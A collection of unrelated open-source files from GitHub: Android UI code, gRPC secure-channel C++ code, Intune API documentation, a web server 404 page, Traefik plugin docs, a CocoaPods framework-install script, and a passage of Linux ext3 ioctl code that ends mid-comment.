import android.util.AttributeSet;
import android.view.LayoutInflater;
import com.cnswan.draginviewpager.R;
import com.cnswan.draginviewpager.utils.SizeUtils;
/**
*
* Created by 00013259 on 2017/4/21.
*/
public class DragViewGroupMatch extends DragViewGroup {
public DragViewGroupMatch(Context context) {
super(context);
}
public DragViewGroupMatch(Context context, AttributeSet attrs) {
super(context, attrs);
}
public DragViewGroupMatch(Context context, AttributeSet attrs, int defStyleAttr) {
super(context, attrs, defStyleAttr);
}
@Override
protected void init(Context context, AttributeSet attrs) {
LayoutInflater.from(context).inflate(R.layout.layout_drag_match, this, true);
super.init(context, attrs);
setMin(SizeUtils.dp2px(context, 50f));
setInitStatus(InitStatus.OPEN_BOTTOM);
}
}
| {
"pile_set_name": "Github"
} |
/*
*
* Copyright 2015 gRPC authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*/
#include <grpc/support/port_platform.h>
#include <grpc/grpc.h>
#include <string.h>
#include <grpc/support/alloc.h>
#include <grpc/support/string_util.h>
#include "src/core/ext/filters/client_channel/client_channel.h"
#include "src/core/ext/filters/client_channel/resolver_registry.h"
#include "src/core/ext/transport/chttp2/client/chttp2_connector.h"
#include "src/core/lib/channel/channel_args.h"
#include "src/core/lib/gprpp/memory.h"
#include "src/core/lib/iomgr/sockaddr_utils.h"
#include "src/core/lib/security/credentials/credentials.h"
#include "src/core/lib/security/security_connector/security_connector.h"
#include "src/core/lib/security/transport/target_authority_table.h"
#include "src/core/lib/slice/slice_hash_table.h"
#include "src/core/lib/slice/slice_internal.h"
#include "src/core/lib/surface/api_trace.h"
#include "src/core/lib/surface/channel.h"
#include "src/core/lib/uri/uri_parser.h"
namespace grpc_core {
class Chttp2SecureClientChannelFactory : public ClientChannelFactory {
public:
Subchannel* CreateSubchannel(const grpc_channel_args* args) override {
grpc_channel_args* new_args = GetSecureNamingChannelArgs(args);
if (new_args == nullptr) {
gpr_log(GPR_ERROR,
"Failed to create channel args during subchannel creation.");
return nullptr;
}
grpc_connector* connector = grpc_chttp2_connector_create();
Subchannel* s = Subchannel::Create(connector, new_args);
grpc_connector_unref(connector);
grpc_channel_args_destroy(new_args);
return s;
}
grpc_channel* CreateChannel(const char* target,
const grpc_channel_args* args) override {
if (target == nullptr) {
gpr_log(GPR_ERROR, "cannot create channel with NULL target name");
return nullptr;
}
// Add channel arg containing the server URI.
UniquePtr<char> canonical_target =
ResolverRegistry::AddDefaultPrefixIfNeeded(target);
grpc_arg arg = grpc_channel_arg_string_create(
const_cast<char*>(GRPC_ARG_SERVER_URI), canonical_target.get());
const char* to_remove[] = {GRPC_ARG_SERVER_URI};
grpc_channel_args* new_args =
grpc_channel_args_copy_and_add_and_remove(args, to_remove, 1, &arg, 1);
grpc_channel* channel =
grpc_channel_create(target, new_args, GRPC_CLIENT_CHANNEL, nullptr);
grpc_channel_args_destroy(new_args);
return channel;
}
private:
static grpc_channel_args* GetSecureNamingChannelArgs(
const grpc_channel_args* args) {
grpc_channel_credentials* channel_credentials =
grpc_channel_credentials_find_in_args(args);
if (channel_credentials == nullptr) {
gpr_log(GPR_ERROR,
"Can't create subchannel: channel credentials missing for secure "
"channel.");
return nullptr;
}
// Make sure security connector does not already exist in args.
if (grpc_security_connector_find_in_args(args) != nullptr) {
gpr_log(GPR_ERROR,
"Can't create subchannel: security connector already present in "
"channel args.");
return nullptr;
}
// To which address are we connecting? By default, use the server URI.
const grpc_arg* server_uri_arg =
grpc_channel_args_find(args, GRPC_ARG_SERVER_URI);
const char* server_uri_str = grpc_channel_arg_get_string(server_uri_arg);
GPR_ASSERT(server_uri_str != nullptr);
grpc_uri* server_uri =
grpc_uri_parse(server_uri_str, true /* suppress errors */);
GPR_ASSERT(server_uri != nullptr);
const TargetAuthorityTable* target_authority_table =
FindTargetAuthorityTableInArgs(args);
UniquePtr<char> authority;
if (target_authority_table != nullptr) {
// Find the authority for the target.
const char* target_uri_str =
Subchannel::GetUriFromSubchannelAddressArg(args);
grpc_uri* target_uri =
grpc_uri_parse(target_uri_str, false /* suppress errors */);
GPR_ASSERT(target_uri != nullptr);
if (target_uri->path[0] != '\0') { // "path" may be empty
const grpc_slice key = grpc_slice_from_static_string(
target_uri->path[0] == '/' ? target_uri->path + 1
: target_uri->path);
const UniquePtr<char>* value = target_authority_table->Get(key);
if (value != nullptr) authority.reset(gpr_strdup(value->get()));
grpc_slice_unref_internal(key);
}
grpc_uri_destroy(target_uri);
}
// If the authority hasn't already been set (either because no target
// authority table was present or because the target was not present
// in the table), fall back to using the original server URI.
if (authority == nullptr) {
authority = ResolverRegistry::GetDefaultAuthority(server_uri_str);
}
grpc_arg args_to_add[2];
size_t num_args_to_add = 0;
if (grpc_channel_args_find(args, GRPC_ARG_DEFAULT_AUTHORITY) == nullptr) {
// If the channel args don't already contain GRPC_ARG_DEFAULT_AUTHORITY,
// add the arg, setting it to the value just obtained.
args_to_add[num_args_to_add++] = grpc_channel_arg_string_create(
const_cast<char*>(GRPC_ARG_DEFAULT_AUTHORITY), authority.get());
}
grpc_channel_args* args_with_authority =
grpc_channel_args_copy_and_add(args, args_to_add, num_args_to_add);
grpc_uri_destroy(server_uri);
// Create the security connector using the credentials and target name.
grpc_channel_args* new_args_from_connector = nullptr;
RefCountedPtr<grpc_channel_security_connector>
subchannel_security_connector =
channel_credentials->create_security_connector(
/*call_creds=*/nullptr, authority.get(), args_with_authority,
&new_args_from_connector);
if (subchannel_security_connector == nullptr) {
gpr_log(GPR_ERROR,
"Failed to create secure subchannel for secure name '%s'",
authority.get());
grpc_channel_args_destroy(args_with_authority);
return nullptr;
}
grpc_arg new_security_connector_arg =
grpc_security_connector_to_arg(subchannel_security_connector.get());
grpc_channel_args* new_args = grpc_channel_args_copy_and_add(
new_args_from_connector != nullptr ? new_args_from_connector
: args_with_authority,
&new_security_connector_arg, 1);
subchannel_security_connector.reset(DEBUG_LOCATION, "lb_channel_create");
if (new_args_from_connector != nullptr) {
grpc_channel_args_destroy(new_args_from_connector);
}
grpc_channel_args_destroy(args_with_authority);
return new_args;
}
};
} // namespace grpc_core
namespace {
grpc_core::Chttp2SecureClientChannelFactory* g_factory;
gpr_once g_factory_once = GPR_ONCE_INIT;
void FactoryInit() {
g_factory = grpc_core::New<grpc_core::Chttp2SecureClientChannelFactory>();
}
} // namespace
// Create a secure client channel:
// Asynchronously: - resolve target
// - connect to it (trying alternatives as presented)
// - perform handshakes
grpc_channel* grpc_secure_channel_create(grpc_channel_credentials* creds,
const char* target,
const grpc_channel_args* args,
void* reserved) {
grpc_core::ExecCtx exec_ctx;
GRPC_API_TRACE(
"grpc_secure_channel_create(creds=%p, target=%s, args=%p, "
"reserved=%p)",
4, ((void*)creds, target, (void*)args, (void*)reserved));
GPR_ASSERT(reserved == nullptr);
grpc_channel* channel = nullptr;
if (creds != nullptr) {
// Add channel args containing the client channel factory and channel
// credentials.
gpr_once_init(&g_factory_once, FactoryInit);
grpc_arg args_to_add[] = {
grpc_core::ClientChannelFactory::CreateChannelArg(g_factory),
grpc_channel_credentials_to_arg(creds)};
grpc_channel_args* new_args = grpc_channel_args_copy_and_add(
args, args_to_add, GPR_ARRAY_SIZE(args_to_add));
new_args = creds->update_arguments(new_args);
// Create channel.
channel = g_factory->CreateChannel(target, new_args);
// Clean up.
grpc_channel_args_destroy(new_args);
}
return channel != nullptr ? channel
: grpc_lame_client_channel_create(
target, GRPC_STATUS_INTERNAL,
"Failed to create secure client channel");
}
| {
"pile_set_name": "Github"
} |
---
title: "iosDeviceFeaturesConfiguration resource type"
description: "iOS Device Features Configuration Profile."
author: "dougeby"
localization_priority: Normal
ms.prod: "intune"
doc_type: resourcePageType
---
# iosDeviceFeaturesConfiguration resource type
Namespace: microsoft.graph
> **Note:** The Microsoft Graph API for Intune requires an [active Intune license](https://go.microsoft.com/fwlink/?linkid=839381) for the tenant.
iOS Device Features Configuration Profile.
Inherits from [appleDeviceFeaturesConfigurationBase](../resources/intune-deviceconfig-appledevicefeaturesconfigurationbase.md)
## Methods
|Method|Return Type|Description|
|:---|:---|:---|
|[List iosDeviceFeaturesConfigurations](../api/intune-deviceconfig-iosdevicefeaturesconfiguration-list.md)|[iosDeviceFeaturesConfiguration](../resources/intune-deviceconfig-iosdevicefeaturesconfiguration.md) collection|List properties and relationships of the [iosDeviceFeaturesConfiguration](../resources/intune-deviceconfig-iosdevicefeaturesconfiguration.md) objects.|
|[Get iosDeviceFeaturesConfiguration](../api/intune-deviceconfig-iosdevicefeaturesconfiguration-get.md)|[iosDeviceFeaturesConfiguration](../resources/intune-deviceconfig-iosdevicefeaturesconfiguration.md)|Read properties and relationships of the [iosDeviceFeaturesConfiguration](../resources/intune-deviceconfig-iosdevicefeaturesconfiguration.md) object.|
|[Create iosDeviceFeaturesConfiguration](../api/intune-deviceconfig-iosdevicefeaturesconfiguration-create.md)|[iosDeviceFeaturesConfiguration](../resources/intune-deviceconfig-iosdevicefeaturesconfiguration.md)|Create a new [iosDeviceFeaturesConfiguration](../resources/intune-deviceconfig-iosdevicefeaturesconfiguration.md) object.|
|[Delete iosDeviceFeaturesConfiguration](../api/intune-deviceconfig-iosdevicefeaturesconfiguration-delete.md)|None|Deletes a [iosDeviceFeaturesConfiguration](../resources/intune-deviceconfig-iosdevicefeaturesconfiguration.md).|
|[Update iosDeviceFeaturesConfiguration](../api/intune-deviceconfig-iosdevicefeaturesconfiguration-update.md)|[iosDeviceFeaturesConfiguration](../resources/intune-deviceconfig-iosdevicefeaturesconfiguration.md)|Update the properties of a [iosDeviceFeaturesConfiguration](../resources/intune-deviceconfig-iosdevicefeaturesconfiguration.md) object.|
## Properties
|Property|Type|Description|
|:---|:---|:---|
|id|String|Key of the entity. Inherited from [deviceConfiguration](../resources/intune-deviceconfig-deviceconfiguration.md)|
|lastModifiedDateTime|DateTimeOffset|DateTime the object was last modified. Inherited from [deviceConfiguration](../resources/intune-deviceconfig-deviceconfiguration.md)|
|createdDateTime|DateTimeOffset|DateTime the object was created. Inherited from [deviceConfiguration](../resources/intune-deviceconfig-deviceconfiguration.md)|
|description|String|Admin provided description of the Device Configuration. Inherited from [deviceConfiguration](../resources/intune-deviceconfig-deviceconfiguration.md)|
|displayName|String|Admin provided name of the device configuration. Inherited from [deviceConfiguration](../resources/intune-deviceconfig-deviceconfiguration.md)|
|version|Int32|Version of the device configuration. Inherited from [deviceConfiguration](../resources/intune-deviceconfig-deviceconfiguration.md)|
|assetTagTemplate|String|Asset tag information for the device, displayed on the login window and lock screen.|
|lockScreenFootnote|String|A footnote displayed on the login window and lock screen. Available in iOS 9.3.1 and later.|
|homeScreenDockIcons|[iosHomeScreenItem](../resources/intune-deviceconfig-ioshomescreenitem.md) collection|A list of app and folders to appear on the Home Screen Dock. This collection can contain a maximum of 500 elements.|
|homeScreenPages|[iosHomeScreenPage](../resources/intune-deviceconfig-ioshomescreenpage.md) collection|A list of pages on the Home Screen. This collection can contain a maximum of 500 elements.|
|notificationSettings|[iosNotificationSettings](../resources/intune-deviceconfig-iosnotificationsettings.md) collection|Notification settings for each bundle id. Applicable to devices in supervised mode only (iOS 9.3 and later). This collection can contain a maximum of 500 elements.|
## Relationships
|Relationship|Type|Description|
|:---|:---|:---|
|assignments|[deviceConfigurationAssignment](../resources/intune-deviceconfig-deviceconfigurationassignment.md) collection|The list of assignments for the device configuration profile. Inherited from [deviceConfiguration](../resources/intune-deviceconfig-deviceconfiguration.md)|
|deviceStatuses|[deviceConfigurationDeviceStatus](../resources/intune-deviceconfig-deviceconfigurationdevicestatus.md) collection|Device configuration installation status by device. Inherited from [deviceConfiguration](../resources/intune-deviceconfig-deviceconfiguration.md)|
|userStatuses|[deviceConfigurationUserStatus](../resources/intune-deviceconfig-deviceconfigurationuserstatus.md) collection|Device configuration installation status by user. Inherited from [deviceConfiguration](../resources/intune-deviceconfig-deviceconfiguration.md)|
|deviceStatusOverview|[deviceConfigurationDeviceOverview](../resources/intune-deviceconfig-deviceconfigurationdeviceoverview.md)|Device Configuration devices status overview Inherited from [deviceConfiguration](../resources/intune-deviceconfig-deviceconfiguration.md)|
|userStatusOverview|[deviceConfigurationUserOverview](../resources/intune-deviceconfig-deviceconfigurationuseroverview.md)|Device Configuration users status overview Inherited from [deviceConfiguration](../resources/intune-deviceconfig-deviceconfiguration.md)|
|deviceSettingStateSummaries|[settingStateDeviceSummary](../resources/intune-deviceconfig-settingstatedevicesummary.md) collection|Device Configuration Setting State Device Summary Inherited from [deviceConfiguration](../resources/intune-deviceconfig-deviceconfiguration.md)|
## JSON Representation
Here is a JSON representation of the resource.
<!-- {
"blockType": "resource",
"keyProperty": "id",
"@odata.type": "microsoft.graph.iosDeviceFeaturesConfiguration"
}
-->
``` json
{
"@odata.type": "#microsoft.graph.iosDeviceFeaturesConfiguration",
"id": "String (identifier)",
"lastModifiedDateTime": "String (timestamp)",
"createdDateTime": "String (timestamp)",
"description": "String",
"displayName": "String",
"version": 1024,
"assetTagTemplate": "String",
"lockScreenFootnote": "String",
"homeScreenDockIcons": [
{
"@odata.type": "microsoft.graph.iosHomeScreenItem",
"displayName": "String",
"pages": [
{
"@odata.type": "microsoft.graph.iosHomeScreenFolderPage",
"displayName": "String",
"apps": [
{
"@odata.type": "microsoft.graph.iosHomeScreenApp",
"displayName": "String",
"bundleID": "String"
}
]
}
]
}
],
"homeScreenPages": [
{
"@odata.type": "microsoft.graph.iosHomeScreenPage",
"displayName": "String",
"icons": [
{
"@odata.type": "microsoft.graph.iosHomeScreenItem",
"displayName": "String",
"pages": [
{
"@odata.type": "microsoft.graph.iosHomeScreenFolderPage",
"displayName": "String",
"apps": [
{
"@odata.type": "microsoft.graph.iosHomeScreenApp",
"displayName": "String",
"bundleID": "String"
}
]
}
]
}
]
}
],
"notificationSettings": [
{
"@odata.type": "microsoft.graph.iosNotificationSettings",
"bundleID": "String",
"appName": "String",
"publisher": "String",
"enabled": true,
"showInNotificationCenter": true,
"showOnLockScreen": true,
"alertType": "String",
"badgesEnabled": true,
"soundsEnabled": true
}
]
}
```
| {
"pile_set_name": "Github"
} |
/*******************************************************************************
* Copyright (c) 2015 btows.com.
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
******************************************************************************/
package com.cleanwiz.applock.ui.adapter;
import android.content.Context;
import android.content.pm.ApplicationInfo;
import android.content.pm.PackageManager;
import android.content.pm.PackageManager.NameNotFoundException;
import android.graphics.Bitmap;
import android.graphics.BitmapFactory;
import android.text.TextUtils;
import android.util.Log;
import android.view.Gravity;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.view.ViewGroup.LayoutParams;
import android.widget.BaseAdapter;
import android.widget.ImageView;
import android.widget.PopupWindow;
import android.widget.RelativeLayout;
import android.widget.TextView;
import com.cleanwiz.applock.R;
import com.cleanwiz.applock.data.LookMyPrivate;
import com.cleanwiz.applock.utils.LogUtil;
import com.gc.materialdesign.views.LayoutRipple;
import java.text.SimpleDateFormat;
import java.util.List;
public class AppLookMyPrivateAdapter extends BaseAdapter {
public List<LookMyPrivate> looMyPrivates;
private Context context;
private LayoutInflater mInflater;
private PackageManager packageManager;
private SimpleDateFormat dFormat = new SimpleDateFormat(
"yyyy.MM.dd HH:mm:ss");
public AppLookMyPrivateAdapter(List<LookMyPrivate> looMyPrivates,
Context context) {
this.looMyPrivates = looMyPrivates;
this.context = context;
this.mInflater = LayoutInflater.from(context);
packageManager = context.getPackageManager();
}
@Override
public int getCount() {
// TODO Auto-generated method stub
LogUtil.e("colin", "count:" + looMyPrivates.size());
return looMyPrivates.size();
}
@Override
public Object getItem(int position) {
// TODO Auto-generated method stub
return looMyPrivates.get(position);
}
@Override
public long getItemId(int position) {
// TODO Auto-generated method stub
return position;
}
@Override
public View getView(int position, View convertView, final ViewGroup parent) {
// TODO Auto-generated method stub
ViewHolder viewHolder = null;
if (convertView == null) {
viewHolder = new ViewHolder();
convertView = mInflater.inflate(R.layout.item_lookmyprivate, null);
viewHolder.headerImageView = (ImageView) convertView
.findViewById(R.id.lookmyprivate_headerimage);
viewHolder.dateTextView = (TextView) convertView
.findViewById(R.id.lookmyprivate_datestring);
viewHolder.detailTextView = (TextView) convertView
.findViewById(R.id.lookmyprivate_detailstring);
viewHolder.ripple = (RelativeLayout) convertView
.findViewById(R.id.layout_item);
convertView.setTag(viewHolder);
} else {
viewHolder = (ViewHolder) convertView.getTag();
}
if (viewHolder != null) {
LookMyPrivate lookMyPrivate = looMyPrivates.get(position);
if (lookMyPrivate != null) {
if (TextUtils.isEmpty(lookMyPrivate.getPicPath())) {
viewHolder.headerImageView
.setImageResource(R.drawable.default_avatar);
viewHolder.headerImageView.setOnClickListener(null);
} else {
final Bitmap bm = BitmapFactory.decodeFile(lookMyPrivate
.getPicPath());
viewHolder.headerImageView.setImageBitmap(bm);
viewHolder.ripple
.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
ImageView imageView = new ImageView(context);
imageView.setImageBitmap(bm);
final PopupWindow popupWindow = new PopupWindow(
imageView,
LayoutParams.WRAP_CONTENT,
LayoutParams.WRAP_CONTENT, true);
popupWindow.setOutsideTouchable(true);
imageView
.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
popupWindow.dismiss();
}
});
popupWindow.showAtLocation(parent,
Gravity.CENTER, 0, 0);
}
});
}
viewHolder.dateTextView.setText(dFormat.format(lookMyPrivate
.getLookDate()));
viewHolder.detailTextView.setText(context
.getString(R.string.try_to_open)
+ " "
+ getLabelBypackageName(lookMyPrivate.getResolver()));
}
}
return convertView;
}
class ViewHolder {
ImageView headerImageView;
TextView dateTextView;
TextView detailTextView;
RelativeLayout ripple;
}
public String getLabelBypackageName(String packageName) {
Log.d("demo3", "packageName:" + packageName);
if (packageManager != null) {
try {
ApplicationInfo info = packageManager.getApplicationInfo(
packageName, PackageManager.GET_UNINSTALLED_PACKAGES);
return (String) packageManager.getApplicationLabel(info);
} catch (NameNotFoundException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
}
return "";
}
}
| {
"pile_set_name": "Github"
} |
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<title>C++ Web Server - 404 - Page Not Found</title>
<link href="/config/cppwebserverpages/resources/images/favicon.ico" rel="icon" type="image/x-icon" />
<link href="/config/cppwebserverpages/resources/images/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="/config/cppwebserverpages/resources/css/cppweb.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="menu">
<h1>404 - Page Not Found</h1>
<br class="separator" />
<p class="footer">© 2018 By Herik Lima and Marcelo Eler</p>
</div>
</body>
</html>
| {
"pile_set_name": "Github"
} |
# Using Plugins
Plugins are available to any instance of Traefik v2.3 or later that is [registered](overview.md#connecting-to-traefik-pilot) with Traefik Pilot.
Plugins are hosted on GitHub, but you can browse plugins to add to your registered Traefik instances from the Traefik Pilot UI.
!!! danger "Experimental Features"
Plugins can potentially modify the behavior of Traefik in unforeseen ways.
Exercise caution when adding new plugins to production Traefik instances.
## Add a Plugin
To add a new plugin to a Traefik instance, you must modify that instance's static configuration.
The code to be added is provided by the Traefik Pilot UI when you choose **Install the Plugin**.
In the example below, we add the [`blockpath`](http://github.com/traefik/plugin-blockpath) and [`rewritebody`](https://github.com/traefik/plugin-rewritebody) plugins:
```toml tab="File (TOML)"
[entryPoints]
[entryPoints.web]
address = ":80"
[pilot]
token = "xxxxxxxxx"
[experimental.plugins]
[experimental.plugins.block]
modulename = "github.com/traefik/plugin-blockpath"
version = "v0.2.0"
[experimental.plugins.rewrite]
modulename = "github.com/traefik/plugin-rewritebody"
version = "v0.3.0"
```
```yaml tab="File (YAML)"
entryPoints:
web:
address: :80
pilot:
token: xxxxxxxxx
experimental:
plugins:
block:
modulename: github.com/traefik/plugin-blockpath
version: v0.2.0
rewrite:
modulename: github.com/traefik/plugin-rewritebody
version: v0.3.0
```
```bash tab="CLI"
--entryPoints.web.address=:80
--pilot.token=xxxxxxxxx
--experimental.plugins.block.modulename=github.com/traefik/plugin-blockpath
--experimental.plugins.block.version=v0.2.0
--experimental.plugins.rewrite.modulename=github.com/traefik/plugin-rewritebody
--experimental.plugins.rewrite.version=v0.3.0
```
## Configuring Plugins
Some plugins will need to be configured by adding a dynamic configuration.
For the `bodyrewrite` plugin, for example:
```yaml tab="Docker"
labels:
- "traefik.http.middlewares.my-rewritebody.plugin.rewrite.rewrites[0].regex=example"
- "traefik.http.middlewares.my-rewritebody.plugin.rewrite.rewrites[0].replacement=test"
```
```yaml tab="Kubernetes"
apiVersion: traefik.containo.us/v1alpha1
kind: Middleware
metadata:
name: my-rewritebody
spec:
plugin:
rewrite:
rewrites:
- regex: example
replacement: test
```
```yaml tab="Consul Catalog"
- "traefik.http.middlewares.my-rewritebody.plugin.rewrite.rewrites[0].regex=example"
- "traefik.http.middlewares.my-rewritebody.plugin.rewrite.rewrites[0].replacement=test"
```
```json tab="Marathon"
"labels": {
"traefik.http.middlewares.my-rewritebody.plugin.rewrite.rewrites[0].regex": "example",
"traefik.http.middlewares.my-rewritebody.plugin.rewrite.rewrites[0].replacement": "test"
}
```
```yaml tab="Rancher"
labels:
- "traefik.http.middlewares.my-rewritebody.plugin.rewrite.rewrites[0].regex=example"
- "traefik.http.middlewares.my-rewritebody.plugin.rewrite.rewrites[0].replacement=test"
```
```toml tab="File (TOML)"
[http.middlewares]
[http.middlewares.my-rewritebody.plugin.rewrite]
lastModified = true
[[http.middlewares.my-rewritebody.plugin.rewrite.rewrites]]
regex = "example"
replacement = "test"
```
```yaml tab="File (YAML)"
http:
middlewares:
my-rewritebody:
plugin:
rewrite:
rewrites:
- regex: example
replacement: test
```
| {
"pile_set_name": "Github"
} |
#!/bin/sh
set -e
echo "mkdir -p ${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
mkdir -p "${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
SWIFT_STDLIB_PATH="${DT_TOOLCHAIN_DIR}/usr/lib/swift/${PLATFORM_NAME}"
install_framework()
{
if [ -r "${BUILT_PRODUCTS_DIR}/$1" ]; then
local source="${BUILT_PRODUCTS_DIR}/$1"
elif [ -r "${BUILT_PRODUCTS_DIR}/$(basename "$1")" ]; then
local source="${BUILT_PRODUCTS_DIR}/$(basename "$1")"
elif [ -r "$1" ]; then
local source="$1"
fi
local destination="${TARGET_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
if [ -L "${source}" ]; then
echo "Symlinked..."
source="$(readlink "${source}")"
fi
# use filter instead of exclude so missing patterns dont' throw errors
echo "rsync -av --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${source}\" \"${destination}\""
rsync -av --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${source}" "${destination}"
local basename
basename="$(basename -s .framework "$1")"
binary="${destination}/${basename}.framework/${basename}"
if ! [ -r "$binary" ]; then
binary="${destination}/${basename}"
fi
# Strip invalid architectures so "fat" simulator / device frameworks work on device
if [[ "$(file "$binary")" == *"dynamically linked shared library"* ]]; then
strip_invalid_archs "$binary"
fi
# Resign the code if required by the build settings to avoid unstable apps
code_sign_if_enabled "${destination}/$(basename "$1")"
# Embed linked Swift runtime libraries. No longer necessary as of Xcode 7.
if [ "${XCODE_VERSION_MAJOR}" -lt 7 ]; then
local swift_runtime_libs
swift_runtime_libs=$(xcrun otool -LX "$binary" | grep --color=never @rpath/libswift | sed -E s/@rpath\\/\(.+dylib\).*/\\1/g | uniq -u && exit ${PIPESTATUS[0]})
for lib in $swift_runtime_libs; do
echo "rsync -auv \"${SWIFT_STDLIB_PATH}/${lib}\" \"${destination}\""
rsync -auv "${SWIFT_STDLIB_PATH}/${lib}" "${destination}"
code_sign_if_enabled "${destination}/${lib}"
done
fi
}
# Signs a framework with the provided identity
code_sign_if_enabled() {
if [ -n "${EXPANDED_CODE_SIGN_IDENTITY}" -a "${CODE_SIGNING_REQUIRED}" != "NO" -a "${CODE_SIGNING_ALLOWED}" != "NO" ]; then
# Use the current code_sign_identitiy
echo "Code Signing $1 with Identity ${EXPANDED_CODE_SIGN_IDENTITY_NAME}"
echo "/usr/bin/codesign --force --sign ${EXPANDED_CODE_SIGN_IDENTITY} ${OTHER_CODE_SIGN_FLAGS} --preserve-metadata=identifier,entitlements \"$1\""
/usr/bin/codesign --force --sign ${EXPANDED_CODE_SIGN_IDENTITY} ${OTHER_CODE_SIGN_FLAGS} --preserve-metadata=identifier,entitlements "$1"
fi
}
# Strip invalid architectures
strip_invalid_archs() {
binary="$1"
# Get architectures for current file
archs="$(lipo -info "$binary" | rev | cut -d ':' -f1 | rev)"
stripped=""
for arch in $archs; do
if ! [[ "${VALID_ARCHS}" == *"$arch"* ]]; then
# Strip non-valid architectures in-place
lipo -remove "$arch" -output "$binary" "$binary" || exit 1
stripped="$stripped $arch"
fi
done
if [[ "$stripped" ]]; then
echo "Stripped $binary of architectures:$stripped"
fi
}
| {
"pile_set_name": "Github"
} |
/*
* linux/fs/ext3/ioctl.c
*
* Copyright (C) 1993, 1994, 1995
* Remy Card ([email protected])
* Laboratoire MASI - Institut Blaise Pascal
* Universite Pierre et Marie Curie (Paris VI)
*/
#include <linux/fs.h>
#include <linux/jbd.h>
#include <linux/capability.h>
#include <linux/ext3_fs.h>
#include <linux/ext3_jbd.h>
#include <linux/mount.h>
#include <linux/time.h>
#include <linux/compat.h>
#include <asm/uaccess.h>
long ext3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
{
struct inode *inode = filp->f_dentry->d_inode;
struct ext3_inode_info *ei = EXT3_I(inode);
unsigned int flags;
unsigned short rsv_window_size;
ext3_debug ("cmd = %u, arg = %lu\n", cmd, arg);
switch (cmd) {
case EXT3_IOC_GETFLAGS:
ext3_get_inode_flags(ei);
flags = ei->i_flags & EXT3_FL_USER_VISIBLE;
return put_user(flags, (int __user *) arg);
case EXT3_IOC_SETFLAGS: {
handle_t *handle = NULL;
int err;
struct ext3_iloc iloc;
unsigned int oldflags;
unsigned int jflag;
if (!is_owner_or_cap(inode))
return -EACCES;
if (get_user(flags, (int __user *) arg))
return -EFAULT;
err = mnt_want_write(filp->f_path.mnt);
if (err)
return err;
flags = ext3_mask_flags(inode->i_mode, flags);
mutex_lock(&inode->i_mutex);
/* Is it quota file? Do not allow user to mess with it */
err = -EPERM;
if (IS_NOQUOTA(inode))
goto flags_out;
oldflags = ei->i_flags;
/* The JOURNAL_DATA flag is modifiable only by root */
jflag = flags & EXT3_JOURNAL_DATA_FL;
/*
* The IMMUTABLE and APPEND_ONLY flags can only be changed by
* the relevant capability.
*
* This test looks nicer. Thanks to Pauline Middelink
*/
if ((flags ^ oldflags) & (EXT3_APPEND_FL | EXT3_IMMUTABLE_FL)) {
if (!capable(CAP_LINUX_IMMUTABLE))
goto flags_out;
}
/*
* The JOURNAL_DATA flag can only be changed by
* the relevant capability.
*/
if ((jflag ^ oldflags) & (EXT3_JOURNAL_DATA_FL)) {
if (!capable(CAP_SYS_RESOURCE))
goto flags_out;
}
handle = ext3_journal_start(inode, 1);
if (IS_ERR(handle)) {
err = PTR_ERR(handle);
goto flags_out;
}
if (IS_SYNC(inode))
handle->h_sync = 1;
err = ext3_reserve_inode_write(handle, inode, &iloc);
if (err)
goto flags_err;
flags = flags & EXT3_FL_USER_MODIFIABLE;
flags |= oldflags & ~EXT3_FL_USER_MODIFIABLE;
ei->i_flags = flags;
ext3_set_inode_flags(inode);
inode->i_ctime = CURRENT_TIME_SEC;
err = ext3_mark_iloc_dirty(handle, inode, &iloc);
flags_err:
ext3_journal_stop(handle);
if (err)
goto flags_out;
if ((jflag ^ oldflags) & (EXT3_JOURNAL_DATA_FL))
err = ext3_change_inode_journal_flag(inode, jflag);
flags_out:
mutex_unlock(&inode->i_mutex);
mnt_drop_write(filp->f_path.mnt);
return err;
}
case EXT3_IOC_GETVERSION:
case EXT3_IOC_GETVERSION_OLD:
return put_user(inode->i_generation, (int __user *) arg);
case EXT3_IOC_SETVERSION:
case EXT3_IOC_SETVERSION_OLD: {
handle_t *handle;
struct ext3_iloc iloc;
__u32 generation;
int err;
if (!is_owner_or_cap(inode))
return -EPERM;
err = mnt_want_write(filp->f_path.mnt);
if (err)
return err;
if (get_user(generation, (int __user *) arg)) {
err = -EFAULT;
goto setversion_out;
}
handle = ext3_journal_start(inode, 1);
if (IS_ERR(handle)) {
err = PTR_ERR(handle);
goto setversion_out;
}
err = ext3_reserve_inode_write(handle, inode, &iloc);
if (err == 0) {
inode->i_ctime = CURRENT_TIME_SEC;
inode->i_generation = generation;
err = ext3_mark_iloc_dirty(handle, inode, &iloc);
}
ext3_journal_stop(handle);
setversion_out:
mnt_drop_write(filp->f_path.mnt);
return err;
}
#ifdef CONFIG_JBD_DEBUG
case EXT3_IOC_WAIT_FOR_READONLY:
/*
